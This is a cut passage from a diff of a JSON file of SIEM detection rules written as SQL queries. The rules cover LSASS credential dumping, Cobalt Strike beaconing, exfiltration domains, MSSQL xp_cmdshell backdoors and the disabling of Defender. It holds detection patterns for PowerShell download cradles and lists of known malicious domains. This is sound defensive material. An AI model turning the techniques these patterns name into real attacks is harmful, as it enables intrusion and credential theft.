https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" ], - "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" }, { - "title": "Remote Thread Creation in Suspicious Targets", - "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", - "status": "experimental", - "description": "Detects a remote thread creation in suspicious target images", - "author": "Florian Roth (Nextron Systems)", + "title": "Atera Agent Installation", + "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "status": "test", + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate Atera agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_targets.yml" + "filename": "win_software_atera_rmm_agent_install.yml" }, { - "title": "KeePass Password Dumping", - "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", + "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", "status": "experimental", - "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", - "author": "Timon Hackenjos", + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.005" + "attack.initial_access", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Other MSI packages for which your admins have used that name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_keepass.yml" + "filename": "win_vul_cve_2021_41379.yml" }, { - "title": "Bumblebee Remote Thread Creation", - "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "title": "Microsoft Malware Protection Engine Crash - WER", + "id": "6c82cf5c-090d-4d57-9188-533577631108", "status": "experimental", - "description": "Detects remote thread injection events based on action seen used by bumblebee", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Windows Error Reporting' AND EventID = '1001' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_bumblebee.yml" + "filename": "win_application_msmpeng_crash_wer.yml" }, { - "title": "Password Dumper Remote Thread in LSASS", - "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "status": "stable", - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", - "author": "Thomas Patzke", + "title": "Audit CVE Event", + "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "status": "experimental", + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "author": "Florian Roth (Nextron Systems), Zach Mathis", "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", + "attack.defense_evasion", + "attack.t1211", "attack.credential_access", - "attack.s0005", - "attack.t1003.001" + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" ], "falsepositives": [ - "Antivirus products" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" ], - "filename": "create_remote_thread_win_password_dumper_lsass.yml" + "filename": "win_audit_cve.yml" }, { - "title": "Remote Thread Creation Ttdinject.exe Proxy", - "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "title": "Microsoft Malware Protection Engine Crash", + "id": "545a5da6-f103-4919-a519-e9aec1026ee4", "status": "experimental", - "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", - "author": "frack113", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_ttdinjec.yml" + "filename": "win_application_msmpeng_crash_error.yml" }, { - "title": "Suspicious Remote Thread Source", - "id": "66d31e5f-52d6-40a4-9615-002d3789a119", + "title": "Potential Credential Dumping Via WER - Application", + "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Perez Diego (@darkquassar), oscd.community", + "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1055" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate crashing of the lsass process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" ], - "filename": "create_remote_thread_win_susp_remote_thread_source.yml" + "filename": "win_werfault_susp_lsass_credential_dump.yml" }, { - "title": "Accessing WinAPI in PowerShell. Code Injection", - "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "status": "test", - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "author": "Nikita Nazarov, oscd.community", + "title": "Restricted Software Access By SRP", + "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "status": "experimental", + "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" ], - "filename": "create_remote_thread_win_powershell_code_injection.yml" + "filename": "win_software_restriction_policies_block.yml" }, { - "title": "CACTUSTORCH Remote Thread Creation", - "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", - "status": "test", - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", - "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "title": "MSSQL XPCmdshell Option Change", + "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_cactustorch.yml" + "filename": "win_mssql_xp_cmdshell_change.yml" }, { - "title": "PowerShell Rundll32 Remote Thread Creation", - "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "title": "MSSQL Add Account To Sysadmin Role", + "id": "08200f85-2678-463e-9c32-88dce2f073d1", "status": "experimental", - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Rare legitimate administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml" + "filename": "win_mssql_add_sysadmin_account.yml" }, { - "title": "Suspicious Scripting in a WMI Consumer", - "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "title": "MSSQL Extended Stored Procedure Backdoor Maggie", + "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", "status": "experimental", - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "author": "Denis Szadkowski, DIRT / DCSO CyTec", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "Legitimate administrative scripts" + "Legitimate extended stored procedures named maggie" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_susp_scripting.yml" + "filename": "win_mssql_sp_maggie.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - Sysmon", - "id": "065cceea-77ec-4030-9052-fc0affea7110", + "title": "MSSQL SPProcoption Set", + "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", "status": "experimental", - "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", - "author": "pH-T (Nextron Systems)", + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.persistence" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Legitimate use of the feature by administrators (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%.anonfiles.com%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_anonymfiles_com.yml" + "filename": "win_mssql_sp_procoption_set.yml" }, { - "title": "DNS HybridConnectionManager Service Bus", - "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "status": "test", - "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "MSSQL XPCmdshell Suspicious Execution", + "id": "7f103213-a04e-4d59-8261-213dddf22314", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.execution" ], "falsepositives": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND NewProcessName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" + "filename": "win_mssql_xp_cmdshell_audit_log.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", - "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", - "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Florian Roth (Nextron Systems)", + "title": "MSSQL Disable Audit Settings", + "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "status": "experimental", + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" ], - "filename": "dns_query_win_mal_cobaltstrike.yml" + "filename": "win_mssql_disable_audit_settings.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - Sysmon", - "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "title": "MSMQ Corrupted Packet Encountered", + "id": "ae94b10d-fee9-4767-82bb-439b309d5a27", "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "yatinwad and TheDFIRReport", + "description": "Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%ufile.io%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSMQ' AND EventID = '2027' AND Level = '2')" ], - "filename": "dns_query_win_ufile_io.yml" + "filename": "win_msmq_corrupted_packet.yml" }, { - "title": "Regsvr32 Network Activity - DNS", - "id": "36e037c4-c228-4866-b6a3-48eb292b9955", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Windows Defender Threat Detection Disabled", + "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "status": "stable", + "description": "Detects disabling Windows Defender threat protection", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.execution", - "attack.t1559.001", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions (should be investigated)", + "Seen being triggered occasionally during Windows 8 Defender Updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" ], - "filename": "dns_query_win_regsvr32_network_activity.yml" + "filename": "win_defender_disabled.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - DNS", - "id": "bd03a0dc-5d93-49eb-b2e8-2dfd268600f8", - "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PSExec and WMI Process Creations Block", + "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", + "status": "test", + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control" + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '%akamaicontainer.com%' ESCAPE '\\' OR QueryName LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR QueryName LIKE '%azuredeploystore.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR QueryName LIKE '%dunamistrd.com%' ESCAPE '\\' OR QueryName LIKE '%glcloudservice.com%' ESCAPE '\\' OR QueryName LIKE '%journalide.org%' ESCAPE '\\' OR QueryName LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR QueryName LIKE '%msedgeupdate.net%' ESCAPE '\\' OR QueryName LIKE '%msstorageazure.com%' ESCAPE '\\' OR QueryName LIKE '%msstorageboxes.com%' ESCAPE '\\' OR QueryName LIKE '%officeaddons.com%' ESCAPE '\\' OR QueryName LIKE '%officestoragebox.com%' ESCAPE '\\' OR QueryName LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR QueryName LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR QueryName LIKE '%pbxsources.com%' ESCAPE '\\' OR QueryName LIKE '%qwepoi123098.com%' ESCAPE '\\' OR QueryName LIKE '%sbmsa.wiki%' ESCAPE '\\' OR QueryName LIKE '%sourceslabs.com%' ESCAPE '\\' OR QueryName LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR QueryName LIKE '%zacharryblogs.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" ], - "filename": "dns_query_win_malware_3cx_compromise.yml" + "filename": "win_defender_psexec_wmi_asr.yml" }, { - "title": "DNS Query for MEGA.io Upload Domain - Sysmon", - "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", - "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "LSASS Access Detected via Attack Surface Reduction", + "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "status": "experimental", + "description": "Detects Access to LSASS Process", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName 